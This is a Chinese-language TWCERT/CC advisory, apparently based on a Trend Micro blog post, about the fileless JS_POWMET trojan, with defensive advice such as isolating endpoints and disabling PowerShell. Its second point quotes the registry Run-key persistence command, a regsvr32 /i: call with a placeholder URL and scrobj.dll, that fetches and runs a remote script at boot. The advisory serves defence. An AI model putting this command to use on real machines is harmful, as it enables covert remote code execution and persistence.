• 發布單位:TWCERT/CC
• 更新日期:2019-03-24
• 點閱次數:268

●重點摘要：
1.一種新的木馬程式，叫做「JS_POWMET」(趨勢科技命名為 JS_POWMET.DE)，該程式會利用 Windows 系統登錄中的開機自動執行機碼來進入電腦，感染過程完全不會在磁碟上產生檔案，以躲避沙箱模擬分析技術偵測。根據趨勢科技全球威脅情報網所收到的初步資料顯示，感染 JS_POWMET 最嚴重的是亞太地區，將近 90% 的感染案例都來自該區域。
2.這種木馬程式很可能是因為使用者瀏覽了惡意網站才被下載，或者是由其他惡意程式植入系統當中。但肯定的是，當該惡意程式下載到系統上時，系統登錄當中就會出現以下機碼： HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run COM+ = “regsvr32 /s /n /u /i:{此處為 JS_POWMET 的下載網址} scrobj.dll”。這個在開機時會自動啟動程式的系統登錄機碼將使得「regsvr32」這個系統程式到網路上下載 JS_POWMET 惡意程式。如此一來，就能讓 regsvr32 執行任何惡意腳本而不需將惡意檔案儲存到電腦系統上。
3.要有效防範這類無檔案式惡意程式，其中一種方法就是針對企業基礎架構實施存取管制，透過一些容器式系統將端點裝置與重要的網路隔離。針對本文介紹的惡意程式，IT 人員也可停用 PowerShell 工具來加以防範，讓 JS_POWMET 後續下載的程式無法執行。

攻擊手法：Trojan Horse

參考連結：

https://blog.trendmicro.com.tw/?p=51589